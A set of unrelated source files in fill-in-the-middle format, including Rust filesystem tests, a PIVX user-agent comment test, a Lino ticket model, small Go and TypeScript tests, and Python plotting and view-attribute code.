}
) }
macro_rules! error { ($e:expr, $s:expr) => (
match $e {
Ok(_) => panic!("Unexpected success. Should've been: {:?}", $s),
Err(ref err) => assert!(err.to_string().contains($s),
format!("`{}` did not contain `{}`", err, $s))
}
) }
pub struct TempDir(PathBuf);
impl TempDir {
fn join(&self, path: &str) -> PathBuf {
let TempDir(ref p) = *self;
p.join(path)
}
fn path<'a>(&'a self) -> &'a Path2 {
let TempDir(ref p) = *self;
p
}
}
impl Drop for TempDir {
fn drop(&mut self) {
// Gee, seeing how we're testing the fs module I sure hope that we
// at least implement this correctly!
let TempDir(ref p) = *self;
check!(fs::remove_dir_all(p));
}
}
pub fn tmpdir() -> TempDir {
let p = env::temp_dir();
let mut r = rand::thread_rng();
let ret = p.join(&format!("rust-{}", r.next_u32()));
check!(fs::create_dir(&ret));
TempDir(ret)
}
#[test]
fn file_test_io_smoke_test() {
let message = "it's alright. have a good time";
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test.txt");
{
let mut write_stream = check!(File::create(filename));
check!(write_stream.write(message.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
let mut read_buf = [0; 1028];
let read_str = match check!(read_stream.read(&mut read_buf)) {
0 => panic!("shouldn't happen"),
n => str::from_utf8(&read_buf[..n]).unwrap().to_string()
};
assert_eq!(read_str, message);
}
check!(fs::remove_file(filename));
}
#[test]
fn invalid_path_raises() {
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_that_does_not_exist.txt");
let result = File::open(filename);
if cfg!(unix) {
error!(result, "o such file or directory");
}
// error!(result, "couldn't open path as file");
// error!(result, format!("path={}; mode=open; access=read", filename.display()));
}
#[test]
fn file_test_iounlinking_invalid_path_should_raise_condition() {
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_another_file_that_does_not_exist.txt");
let result = fs::remove_file(filename);
if cfg!(unix) {
error!(result, "o such file or directory");
}
// error!(result, "couldn't unlink path");
// error!(result, format!("path={}", filename.display()));
}
#[test]
fn file_test_io_non_positional_read() {
let message: &str = "ten-four";
let mut read_mem = [0; 8];
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test_positional.txt");
{
let mut rw_stream = check!(File::create(filename));
check!(rw_stream.write(message.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
{
let read_buf = &mut read_mem[0..4];
check!(read_stream.read(read_buf));
}
{
let read_buf = &mut read_mem[4..8];
check!(read_stream.read(read_buf));
}
}
check!(fs::remove_file(filename));
let read_str = str::from_utf8(&read_mem).unwrap();
assert_eq!(read_str, message);
}
#[test]
fn file_test_io_seek_and_tell_smoke_test() {
let message = "ten-four";
let mut read_mem = [0; 4];
let set_cursor = 4 as u64;
let mut tell_pos_pre_read;
let mut tell_pos_post_read;
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test_seeking.txt");
{
let mut rw_stream = check!(File::create(filename));
check!(rw_stream.write(message.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
check!(read_stream.seek(SeekFrom::Start(set_cursor)));
tell_pos_pre_read = check!(read_stream.seek(SeekFrom::Current(0)));
check!(read_stream.read(&mut read_mem));
tell_pos_post_read = check!(read_stream.seek(SeekFrom::Current(0)));
}
check!(fs::remove_file(filename));
let read_str = str::from_utf8(&read_mem).unwrap();
assert_eq!(read_str, &message[4..8]);
assert_eq!(tell_pos_pre_read, set_cursor);
assert_eq!(tell_pos_post_read, message.len() as u64);
}
#[test]
fn file_test_io_seek_and_write() {
let initial_msg = "food-is-yummy";
let overwrite_msg = "-the-bar!!";
let final_msg = "foo-the-bar!!";
let seek_idx = 3;
let mut read_mem = [0; 13];
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test_seek_and_write.txt");
{
let mut rw_stream = check!(File::create(filename));
check!(rw_stream.write(initial_msg.as_bytes()));
check!(rw_stream.seek(SeekFrom::Start(seek_idx)));
check!(rw_stream.write(overwrite_msg.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
check!(read_stream.read(&mut read_mem));
}
check!(fs::remove_file(filename));
let read_str = str::from_utf8(&read_mem).unwrap();
assert!(read_str == final_msg);
}
#[test]
fn file_test_io_seek_shakedown() {
// 01234567890123
let initial_msg = "qwer-asdf-zxcv";
let chunk_one: &str = "qwer";
let chunk_two: &str = "asdf";
let chunk_three: &str = "zxcv";
let mut read_mem = [0; 4];
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test_seek_shakedown.txt");
{
let mut rw_stream = check!(File::create(filename));
check!(rw_stream.write(initial_msg.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
check!(read_stream.seek(SeekFrom::End(-4)));
check!(read_stream.read(&mut read_mem));
assert_eq!(str::from_utf8(&read_mem).unwrap(), chunk_three);
check!(read_stream.seek(SeekFrom::Current(-9)));
check!(read_stream.read(&mut read_mem));
assert_eq!(str::from_utf8(&read_mem).unwrap(), chunk_two);
check!(read_stream.seek(SeekFrom::Start(0)));
check!(read_stream.read(&mut read_mem));
assert_eq!(str::from_utf8(&read_mem).unwrap(), chunk_one);
}
check!(fs::remove_file(filename));
}
#[test]
fn file_test_stat_is_correct_on_is_file() {
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_stat_correct_on_is_file.txt");
{
let mut opts = OpenOptions::new();
let mut fs = check!(opts.read(true).write(true)
.create(true).open(filename));
let msg = "hw";
fs.write(msg.as_bytes()).unwrap();
let fstat_res = check!(fs.metadata());
assert!(fstat_res.is_file());
}
let stat_res_fn = check!(fs::metadata(filename));
assert!(stat_res_fn.is_file());
let stat_res_meth = check!(filename.metadata());
assert!(stat_res_meth.is_file());
check!(fs::remove_file(filename));
}
#[test]
fn file_test_stat_is_correct_on_is_dir() {
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_stat_correct_on_is_dir");
check!(fs::create_dir(filename));
let stat_res_fn = check!(fs::metadata(filename));
assert!(stat_res_fn.is_dir());
let stat_res_meth = check!(filename.metadata());
assert!(stat_res_meth.is_dir());
check!(fs::remove_dir(filename));
}
#[test]
fn file_test_fileinfo_false_when_checking_is_file_on_a_directory() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("fileinfo_false_on_dir");
check!(fs::create_dir(dir));
assert!(dir.is_file() == false);
check!(fs::remove_dir(dir));
}
#[test]
fn file_test_fileinfo_check_exists_before_and_after_file_creation() {
let tmpdir = tmpdir();
let file = &tmpdir.join("fileinfo_check_exists_b_and_a.txt");
check!(check!(File::create(file)).write(b"foo"));
assert!(file.exists());
check!(fs::remove_file(file));
assert!(!file.exists());
}
#[test]
fn file_test_directoryinfo_check_exists_before_and_after_mkdir() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("before_and_after_dir");
assert!(!dir.exists());
check!(fs::create_dir(dir));
assert!(dir.exists());
assert!(dir.is_dir());
check!(fs::remove_dir(dir));
assert!(!dir.exists());
}
#[test]
fn file_test_directoryinfo_readdir() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("di_readdir");
check!(fs::create_dir(dir));
let prefix = "foo";
for n in 0..3 {
let f = dir.join(&format!("{}.txt", n));
let mut w = check!(File::create(&f));
let msg_str = format!("{}{}", prefix, n.to_string());
let msg = msg_str.as_bytes();
check!(w.write(msg));
}
let files = check!(fs::read_dir(dir));
let mut mem = [0; 4];
for f in files {
let f = f.unwrap().path();
{
let n = f.file_stem().unwrap();
check!(check!(File::open(&f)).read(&mut mem));
let read_str = str::from_utf8(&mem).unwrap();
let expected = format!("{}{}", prefix, n.to_str().unwrap());
assert_eq!(expected, read_str);
}
check!(fs::remove_file(&f));
}
check!(fs::remove_dir(dir));
}
#[test]
fn file_test_walk_dir() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("walk_dir");
check!(fs::create_dir(dir));
let dir1 = &dir.join("01/02/03");
check!(fs::create_dir_all(dir1));
check!(File::create(&dir1.join("04")));
let dir2 = &dir.join("11/12/13");
check!(fs::create_dir_all(dir2));
check!(File::create(&dir2.join("14")));
let files = check!(fs::walk_dir(dir));
let mut cur = [0; 2];
for f in files {
let f = f.unwrap().path();
let stem = f.file_stem().unwrap().to_str().unwrap();
let root = stem.as_bytes()[0] - b'0';
let name = stem.as_bytes()[1] - b'0';
assert!(cur[root as usize] < name);
cur[root as usize] = name;
}
check!(fs::remove_dir_all(dir));
}
#[test]
fn mkdir_path_already_exists_error() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("mkdir_error_twice");
check!(fs::create_dir(dir));
let e = fs::create_dir(dir).err().unwrap();
assert_eq!(e.kind(), ErrorKind::AlreadyExists);
}
#[test]
fn recursive_mkdir() {
let tmpdir = tmpdir();
let dir = tmpdir.join("d1/d2");
check!(fs::create_dir_all(&dir));
assert!(dir.is_dir())
}
#[test]
fn recursive_mkdir_failure() {
let tmpdir = tmpdir();
let dir = tmpdir.join("d1");
let file = dir.join("f1");
check!(fs::create_dir_all(&dir));
check!(File::create(&file));
let result = fs::create_dir_all(&file);
assert!(result.is_err());
// error!(result, "couldn't recursively mkdir");
// error!(result, "couldn't create directory");
// error!(result, "mode=0700");
// error!(result, format!("path={}", file.display()));
}
#[test]
fn recursive_mkdir_slash() {
check!(fs::create_dir_all(&Path2::new("/")));
}
// FIXME(#12795) depends on lstat to work on windows
#[cfg(not(windows))]
#[test]
fn recursive_rmdir() {
let tmpdir = tmpdir();
let d1 = tmpdir.join("d1");
let dt = d1.join("t");
let dtt = dt.join("t");
let d2 = tmpdir.join("d2");
let canary = d2.join("do_not_delete");
check!(fs::create_dir_all(&dtt));
check!(fs::create_dir_all(&d2));
check!(check!(File::create(&canary)).write(b"foo"));
check!(fs::soft_link(&d2, &dt.join("d2")));
check!(fs::remove_dir_all(&d1));
assert!(!d1.is_dir());
assert!(canary.exists());
}
#[test]
fn unicode_path_is_dir() {
assert!(Path2::new(".").is_dir());
assert!(!Path2::new("test/stdtest/fs.rs").is_dir());
let tmpdir = tmpdir();
let mut dirpath = tmpdir.path().to_path_buf();
dirpath.push(&format!("test-가一ー你好"));
check!(fs::create_dir(&dirpath));
assert!(dirpath.is_dir());
let mut filepath = dirpath;
filepath.push("unicode-file-\u{ac00}\u{4e00}\u{30fc}\u{4f60}\u{597d}.rs");
check!(File::create(&filepath)); // ignore return; touch only
assert!(!filepath.is_dir());
assert!(filepath.exists());
}
#[test]
fn unicode_path_exists() {
assert!(Path2::new(".").exists());
assert!(!Path2::new("test/nonexistent-bogus-path").exists());
let tmpdir = tmpdir();
let unicode = tmpdir.path();
let unicode = unicode.join(&format!("test-각丁ー再见"));
check!(fs::create_dir(&unicode));
assert!(unicode.exists());
assert!(!Path2::new("test/unicode-bogus-path-각丁ー再见").exists());
}
#[test]
fn copy_file_does_not_exist() {
let from = Path2::new("test/nonexistent-bogus-path");
let to = Path2::new("test/other-bogus-path");
match fs::copy(&from, &to) {
Ok(..) => panic!(),
Err(..) => {
assert!(!from.exists());
assert!(!to.exists());
}
}
}
#[test]
fn copy_file_ok() {
let tmpdir = tmpdir();
let input = tmpdir.join("in.txt");
let out = tmpdir.join("out.txt");
check!(check!(File::create(&input)).write(b"hello"));
check!(fs::copy(&input, &out));
let mut v = Vec::new();
check!(check!(File::open(&out)).read_to_end(&mut v));
assert_eq!(v, b"hello");
assert_eq!(check!(input.metadata()).permissions(),
check!(out.metadata()).permissions());
}
#[test]
fn copy_file_dst_dir() {
let tmpdir = tmpdir();
let out = tmpdir.join("out");
check!(File::create(&out));
match fs::copy(&*out, tmpdir.path()) {
Ok(..) => panic!(), Err(..) => {}
}
}
#[test]
fn copy_file_dst_exists() {
let tmpdir = tmpdir();
let input = tmpdir.join("in");
let output = tmpdir.join("out");
check!(check!(File::create(&input)).write("foo".as_bytes()));
check!(check!(File::create(&output)).write("bar".as_bytes()));
check!(fs::copy(&input, &output));
let mut v = Vec::new();
check!(check!(File::open(&output)).read_to_end(&mut v));
assert_eq!(v, b"foo".to_vec());
}
#[test]
fn copy_file_src_dir() {
let tmpdir = tmpdir();
let out = tmpdir.join("out");
match fs::copy(tmpdir.path(), &out) {
Ok(..) => panic!(), Err(..) => {}
}
assert!(!out.exists());
}
#[test]
fn copy_file_preserves_perm_bits() {
let tmpdir = tmpdir();
let input = tmpdir.join("in.txt");
let out = tmpdir.join("out.txt");
let attr = check!(check!(File::create(&input)).metadata());
let mut p = attr.permissions();
p.set_readonly(true);
check!(fs::set_permissions(&input, p));
check!(fs::copy(&input, &out));
assert!(check!(out.metadata()).permissions().readonly());
check!(fs::set_permissions(&input, attr.permissions()));
check!(fs::set_permissions(&out, attr.permissions()));
}
#[cfg(not(windows))] // FIXME(#10264) operation not permitted?
#[test]
fn symlinks_work() {
let tmpdir = tmpdir();
let input = tmpdir.join("in.txt");
let out = tmpdir.join("out.txt");
check!(check!(File::create(&input)).write("foobar".as_bytes()));
check!(fs::soft_link(&input, &out));
// if cfg!(not(windows)) {
// assert_eq!(check!(lstat(&out)).kind, FileType::Symlink);
// assert_eq!(check!(out.lstat()).kind, FileType::Symlink);
// }
assert_eq!(check!(fs::metadata(&out)).len(),
check!(fs::metadata(&input)).len());
let mut v = Vec::new();
check!(check!(File::open(&out)).read_to_end(&mut v));
assert_eq!(v, b"foobar".to_vec());
}
#[cfg(not(windows))] // apparently windows doesn't like symlinks
#[test]
fn symlink_noexist() {
let tmpdir = tmpdir();
// symlinks can point to things that don't exist
check!(fs::soft_link(&tmpdir.join("foo"), &tmpdir.join("bar")));
assert_eq!(check!(fs::read_link(&tmpdir.join("bar"))),
tmpdir.join("foo"));
}
#[test]
fn readlink_not_symlink() {
let tmpdir = tmpdir();
match fs::read_link(tmpdir.path()) {
Ok(..) => panic!("wanted a failure"),
Err(..) => {}
}
}
#[test]
fn links_work() {
let tmpdir = tmpdir();
let input = tmpdir.join("in.txt");
let out = tmpdir.join("out.txt");
check!(check!(File::create(&input)).write("foobar".as_bytes()));
check!(fs::hard_link(&input, &out));
assert_eq!(check!(fs::metadata(&out)).len(),
check!(fs::metadata(&input)).len());
assert_eq!(check!(fs::metadata(&out)).len(),
check!(input.metadata()).len());
let mut v = Vec::new();
check!(check!(File::open(&out)).read_to_end(&mut v));
assert_eq!(v, b"foobar".to_vec());
// can't link to yourself
match fs::hard_link(&input, &input) {
Ok(..) => panic!("wanted a failure"),
Err(..) => {}
}
// can't link to something that doesn't exist
match fs::hard_link(&tmpdir.join("foo"), &tmpdir.join("bar")) {
Ok(..) => panic!("wanted a failure"),
Err(..) => {}
}
}
#[test]
fn chmod_works() {
let tmpdir = tmpdir();
let file = tmpdir.join("in.txt");
check!(File::create(&file));
let attr = check!(fs::metadata(&file));
assert!(!attr.permissions().readonly());
let mut p = attr.permissions();
p.set_readonly(true);
check!(fs::set_permissions(&file, p.clone()));
let attr = check!(fs::metadata(&file));
assert!(attr.permissions().readonly());
match fs::set_permissions(&tmpdir.join("foo"), p.clone()) {
Ok(..) => panic!("wanted an error"),
Err(..) => {}
}
p.set_readonly(false);
check!(fs::set_permissions(&file, p));
}
#[test]
fn sync_doesnt_kill_anything() {
let tmpdir = tmpdir();
let path = tmpdir.join("in.txt");
let mut file = check!(File::create(&path));
check!(file.sync_all());
check!(file.sync_data());
check!(file.write(b"foo"));
check!(file.sync_all());
check!(file.sync_data());
}
#[test]
fn truncate_works() {
let tmpdir = tmpdir();
let path = tmpdir.join("in.txt");
let mut file = check!(File::create(&path));
check!(file.write(b"foo"));
check!(file.sync_all());
// Do some simple things with truncation
assert_eq!(check!(file.metadata()).len(), 3);
check!(file.set_len(10));
assert_eq!(check!(file.metadata()).len(), 10);
check!(file.write(b"bar"));
check!(file.sync_all());
assert_eq!(check!(file.metadata()).len(), 10);
let mut v = Vec::new();
check!(check!(File::open(&path)).read_to_end(&mut v));
assert_eq!(v, b"foobar\0\0\0\0".to_vec());
// Truncate to a smaller length, don't seek, and then write something.
// Ensure that the intermediate zeroes are all filled in (we have `seek`ed
// past the end of the file).
check!(file.set_len(2));
assert_eq!(check!(file.metadata()).len(), 2);
check!(file.write(b"wut"));
check!(file.sync_all());
assert_eq!(check!(file.metadata()).len(), 9);
let mut v = Vec::new();
check!(check!(File::open(&path)).read_to_end(&mut v));
assert_eq!(v, b"fo\0\0\0\0wut".to_vec());
}
#[test]
fn open_flavors() {
use fs::OpenOptions as OO;
fn c<T: Clone>(t: &T) -> T { t.clone() }
let tmpdir = tmpdir();
let mut r = OO::new(); r.read(true);
let mut w = OO::new(); w.write(true);
let mut rw = OO::new(); rw.write(true).read(true);
match r.open(&tmpdir.join("a")) {
Ok(..) => panic!(), Err(..) => {}
}
// Perform each one twice to make sure that it succeeds the second time
// (where the file exists)
check!(c(&w).create(true).open(&tmpdir.join("b")));
assert!(tmpdir.join("b").exists());
check!(c(&w).create(true).open(&tmpdir.join("b")));
check!(w.open(&tmpdir.join("b")));
check!(c(&rw).create(true).open(&tmpdir.join("c")));
assert!(tmpdir.join("c").exists());
check!(c(&rw).create(true).open(&tmpdir.join("c")));
check!(rw.open(&tmpdir.join("c")));
check!(c(&w).append(true).create(true).open(&tmpdir.join("d")));
assert!(tmpdir.join("d").exists());
check!(c(&w).append(true).create(true).open(&tmpdir.join("d")));
check!(c(&w).append(true).open(&tmpdir.join("d")));
check!(c(&rw).append(true).create(true).open(&tmpdir.join("e")));
assert!(tmpdir.join("e").exists());
check!(c(&rw).append(true).create(true).open(&tmpdir.join("e")));
check!(c(&rw).append(true).open(&tmpdir.join("e")));
check!(c(&w).truncate(true).create(true).open(&tmpdir.join("f")));
assert!(tmpdir.join("f").exists());
check!(c(&w).truncate(true).create(true).open(&tmpdir.join("f")));
check!(c(&w).truncate(true).open(&tmpdir.join("f")));
check!(c(&rw).truncate(true).create(true).open(&tmpdir.join("g")));
assert!(tmpdir.join("g").exists());
check!(c(&rw).truncate(true).create(true).open(&tmpdir.join("g")));
check!(c(&rw).truncate(true).open(&tmpdir.join("g")));
check!(check!(File::create(&tmpdir.join("h"))).write("foo".as_bytes()));
check!(r.open(&tmpdir.join("h")));
{
let mut f = check!(r.open(&tmpdir.join("h")));
assert!(f.write("wut".as_bytes()).is_err());
}
assert_eq!(check!(fs::metadata(&tmpdir.join("h"))).len(), 3);
{
let mut f = check!(c(&w).append(true).open(&tmpdir.join("h")));
check!(f.write("bar".as_bytes()));
}
assert_eq!(check!(fs::metadata(&tmpdir.join("h"))).len(), 6);
{
let mut f = check!(c(&w).truncate(true).open(&tmpdir.join("h")));
check!(f.write("bar".as_bytes()));
}
assert_eq!(check!(fs::metadata(&tmpdir.join("h"))).len(), 3);
}
#[test]
fn utime() {
let tmpdir = tmpdir();
let path = tmpdir.join("a");
check!(File::create(&path));
// These numbers have to be bigger than the time in the day to account
// for timezones Windows in particular will fail in certain timezones
// with small enough values
check!(fs::set_file_times(&path, 100000, 200000));
assert_eq!(check!(path.metadata()).accessed(), 100000);
assert_eq!(check!(path.metadata()).modified(), 200000);
}
#[test]
fn utime_noexist() {
let tmpdir = tmpdir();
match fs::set_file_times(&tmpdir.join("a"), 100, 200) {
Ok(..) => panic!(),
Err(..) => {}
}
}
#[test]
fn binary_file() {
let mut bytes = [0; 1024];
StdRng::new().unwrap().fill_bytes(&mut bytes);
let tmpdir = tmpdir();
check!(check!(File::create(&tmpdir.join("test"))).write(&bytes));
let mut v = Vec::new();
check!(check!(File::open(&tmpdir.join("test"))).read_to_end(&mut v));
assert!(v == &bytes[..]);
}
#[test]
#[cfg(not(windows))]
fn unlink_readonly() {
let tmpdir = tmpdir();
let path = tmpdir.join("file");
check!(File::create(&path));
let mut perm = check!(fs::metadata(&path)).permissions();
perm.set_readonly(true);
check!(fs::set_permissions(&path, perm));
check!(fs::remove_file(&path));
}
#[test]
fn mkdir_trailing_slash() {
let tmpdir = tmpdir();
let path = tmpdir.join("file");
check!(fs::create_dir_all(&path.join("a/")));
}
#[test]
#[cfg(not(windows))]
fn realpath_works() {
let tmpdir = tmpdir();
let tmpdir = fs::canonicalize(tmpdir.path()).unwrap();
let file = tmpdir.join("test");
let dir = tmpdir.join("test2");
let link = dir.join("link");
let linkdir = tmpdir.join("test3");
File::create(&file).unwrap();
fs::create_dir(&dir).unwrap();
fs::soft_link(&file, &link).unwrap();
fs::soft_link(&dir, &linkdir).unwrap();
assert!(link.symlink_metadata().unwrap().file_type().is_symlink());
assert_eq!(fs::canonicalize(&tmpdir).unwrap(), tmpdir);
assert_eq!(fs::canonicalize(&file).unwrap(), file);
assert_eq!(fs::canonicalize(&link).unwrap(), file);
assert_eq!(fs::canonicalize(&linkdir).unwrap(), dir);
assert_eq!(fs::canonicalize(&linkdir.join("link")).unwrap(), file);
}
#[test]
#[cfg(not(windows))]
fn realpath_works_tricky() {
let tmpdir = tmpdir();
let tmpdir = fs::canonicalize(tmpdir.path()).unwrap();
let a = tmpdir.join("a");
let b = a.join("b");
let c = b.join("c");
let d = a.join("d");
let e = d.join("e");
let f = a.join("f");
fs::create_dir_all(&b).unwrap();
fs::create_dir_all(&d).unwrap();
File::create(&f).unwrap();
fs::soft_link("../d/e", &c).unwrap();
fs::soft_link("../f", &e).unwrap();
assert_eq!(fs::canonicalize(&c).unwrap(), f);
assert_eq!(fs::canonicalize(&e).unwrap(), f);
}
#[test]
fn dir_entry_methods() {
let tmpdir = tmpdir();
fs::create_dir_all(&tmpdir.join("a")).unwrap();
File::create(&tmpdir.join("b")).unwrap();
for file in tmpdir.path().read_dir().unwrap().map(|f| f.unwrap()) {
let fname = file.file_name();
match fname.to_str() {
Some("a") => {
assert!(file.file_type().unwrap().is_dir());
assert!(file.metadata().unwrap().is_dir());
}
Some("b") => {
assert!(file.file_type().unwrap().is_file());
assert!(file.metadata().unwrap().is_file());
}
f => panic!("unknown file name: {:?}", f),
}
}
}
}<|fim▁end|> | |
<|file_name|>feature_uacomment.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -uacomment option."""
from test_framework.test_framework import PivxTestFramework
from test_framework.util import assert_equal
class UacommentTest(PivxTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
self.log.info("test multiple -uacomment")
test_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-12:-1]
assert_equal(test_uacomment, "(testnode0)")
self.restart_node(0, ["-uacomment=foo"])
foo_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-17:-1]
assert_equal(foo_uacomment, "(testnode0; foo)")
self.log.info("test -uacomment max length")
self.stop_node(0)
expected = "exceeds maximum length (256). Reduce the number or size of uacomments."
self.assert_start_raises_init_error(0, ["-uacomment=" + 'a' * 256], expected)
self.log.info("test -uacomment unsafe characters")<|fim▁hole|> for unsafe_char in ['/', ':', '(', ')']:
expected = "User Agent comment (" + unsafe_char + ") contains unsafe characters"
self.assert_start_raises_init_error(0, ["-uacomment=" + unsafe_char], expected)
if __name__ == '__main__':
UacommentTest().main()<|fim▁end|> | |
<|file_name|>models.py<|end_file_name|><|fim▁begin|># -*- coding: UTF-8 -*-
# Copyright 2016-2017 Rumma & Ko Ltd
# License: BSD (see file COPYING for details)
from lino_xl.lib.tickets.models import *
from lino.api import _
Ticket.hide_elements('closed')
# class Ticket(Ticket):
# class Meta(Ticket.Meta):
# app_label = 'tickets'
# verbose_name = _("Plea")
# verbose_name_plural = _("Pleas")
# abstract = dd.is_abstract_model(__name__, 'Ticket')
# ActiveTickets._label = _("Active pleas")
# UnassignedTickets._label = _("Unassigned pleas")
# PublicTickets._label = _("Public pleas")
# TicketsToTriage._label = _("Pleas to triage")
# TicketsToTalk._label = _("Pleas to talk")
# # TicketsToDo._label = _("Pleas to to")
# AllTickets._label = _("All pleas")
dd.update_field(
'tickets.Ticket', 'upgrade_notes', verbose_name=_("Solution"))
# dd.update_field(
# 'tickets.Ticket', 'state', default=TicketStates.todo.as_callable)
class TicketDetail(TicketDetail):
main = "general history_tab more"
general = dd.Panel("""
general1:60 votes.VotesByVotable:20 uploads.UploadsByController<|fim▁hole|> """, label=_("General"))
general1 = """
summary:40 id:6 deadline
user:12 end_user:12 #faculty #topic
site workflow_buttons
"""
history_tab = dd.Panel("""
changes.ChangesByMaster:50 #stars.StarsByController:20
""", label=_("History"), required_roles=dd.login_required(Triager))
more = dd.Panel("""
more1:60 #skills.AssignableWorkersByTicket:20
upgrade_notes LinksByTicket skills.OffersByDemander
""", label=_("More"), required_roles=dd.login_required(Triager))
more1 = """
created modified ticket_type:10
state priority project
# standby feedback closed
"""
Tickets.detail_layout = TicketDetail()<|fim▁end|> | description:30 comments.CommentsByRFC:30 skills.DemandsByDemander #working.SessionsByTicket:20 |
<|file_name|>5.0-parity_test.go<|end_file_name|><|fim▁begin|><|fim▁hole|>package epi
import (
"testing"
"github.com/stretchr/testify/assert"
)
// Write a function to calculate the parity
// returns 1 if odd number of bits
// return 0 if even number of bits
func parity(n uint64) int {
count := 0
for i := 0; i < 64; i++ {
if (n & (1 << uint64(i))) > 0 {
count++
}
}
if count%2 == 0 {
return 0
}
return 1
}
func TestGoParity(t *testing.T) {
assert.Equal(t, 0, parity(3))
assert.Equal(t, 1, parity(1))
}<|fim▁end|> | |
<|file_name|>test.ts<|end_file_name|><|fim▁begin|>/*
* @license Apache-2.0
*
* Copyright (c) 2020 The Stdlib Authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import rampf = require( './index' );
// TESTS //
// The function returns a number...
{
rampf( 2 ); // $ExpectType number
}
// The function does not compile if provided a value other than a number...
{
rampf( true ); // $ExpectError
rampf( false ); // $ExpectError
rampf( null ); // $ExpectError<|fim▁hole|> rampf( undefined ); // $ExpectError
rampf( '5' ); // $ExpectError
rampf( [] ); // $ExpectError
rampf( {} ); // $ExpectError
rampf( ( x: number ): number => x ); // $ExpectError
}
// The function does not compile if provided insufficient arguments...
{
rampf(); // $ExpectError
}<|fim▁end|> | |
<|file_name|>history.py<|end_file_name|><|fim▁begin|>def plotHistory(plot_context, axes):
"""
@type axes: matplotlib.axes.Axes
@type plot_config: PlotConfig
"""
plot_config = plot_context.plotConfig()
if (
not plot_config.isHistoryEnabled()
or plot_context.history_data is None
or plot_context.history_data.empty
):
return
data = plot_context.history_data
style = plot_config.historyStyle()
lines = axes.plot_date(
x=data.index.values,
y=data,<|fim▁hole|> linestyle=style.line_style,
linewidth=style.width,
markersize=style.size,
)
if len(lines) > 0 and style.isVisible():
plot_config.addLegendItem("History", lines[0])<|fim▁end|> | color=style.color,
alpha=style.alpha,
marker=style.marker, |
<|file_name|>create.rs<|end_file_name|><|fim▁begin|>static LOREM_IPSUM: &'static str =
"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse
cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non
proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
";
use std::error::Error;
use std::io::prelude::*;
use std::fs::File;
use std::path::Path;
fn main() {
let path = Path::new("out/lorem_ipsum.txt");
let display = path.display();
// 以只写模式打开文件,返回 `io::Result<File>`
let mut file = match File::create(&path) {
Err(why) => panic!("couldn't create {}: {}",
display,
why.description()),
Ok(file) => file,
};
// 将 `LOREM_IPSUM` 字符串写进 `file`,返回 `io::Result<()>`
match file.write_all(LOREM_IPSUM.as_bytes()) {
Err(why) => {
panic!("couldn't write to {}: {}", display,
why.description())
},<|fim▁hole|><|fim▁end|> | Ok(_) => println!("successfully wrote to {}", display),
}
} |
<|file_name|>view_attributes.py<|end_file_name|><|fim▁begin|>'''
These classes specify the attributes
that a view object can have when editing views
'''
__author__ = 'William Emfinger'
__copyright__ = 'Copyright 2016, ROSMOD'
__credits__ = ['William Emfinger', 'Pranav Srinivas Kumar']
__license__ = 'GPL'
__version__ = '0.4'
__maintainer__ = 'William Emfinger'
__email__ = '[email protected]'
__status__ = 'Production'
from meta import Attribute
objects = ['Container', 'Association']
# model related
class Object(Attribute):
tooltip = 'What kind of object is being viewed.'
options = objects
def __init__(self, value):
super(Object, self).__init__('list', value)
# drawing related
class Layout_Style(Attribute):
tooltip = 'How are the children arranged in this object.'
options = ['horizontal', 'vertical', 'grid', 'anchor']
def __init__(self, value):
super(Layout_Style, self).__init__('list', value)
class Width(Attribute):
tooltip = 'Width of the object.'
def __init__(self, value):
super(Width, self).__init__('float', value)
class Height(Attribute):
tooltip = 'Height of the object.'
def __init__(self, value):
super(Height, self).__init__('float', value)
class Draw_Style(Attribute):
tooltip = 'How the object is drawn.'
options = ['icon', 'ellipse', 'rect', 'round rect', 'hidden']<|fim▁hole|> super(Draw_Style, self).__init__('list', value)
class Icon(Attribute):
tooltip = 'Icon displayed as background of the object.'
def __init__(self, value):
super(Icon, self).__init__('file_png', value)
class Color(Attribute):
tooltip = 'What color will the object be drawn with.'
def __init__(self, value):
super(Color, self).__init__('string', value)
class Text_Location(Attribute):
tooltip = 'Where will text be located?'
options = ['top', 'bottom', 'left', 'right', 'center']
def __init__(self, value):
super(Text_Location, self).__init__('list', value)
class Text_Horizontal_Alignment(Attribute):
tooltip = 'Horizontal Alignment of text'
options = ['left', 'right', 'horizontal center', 'justify']
def __init__(self, value):
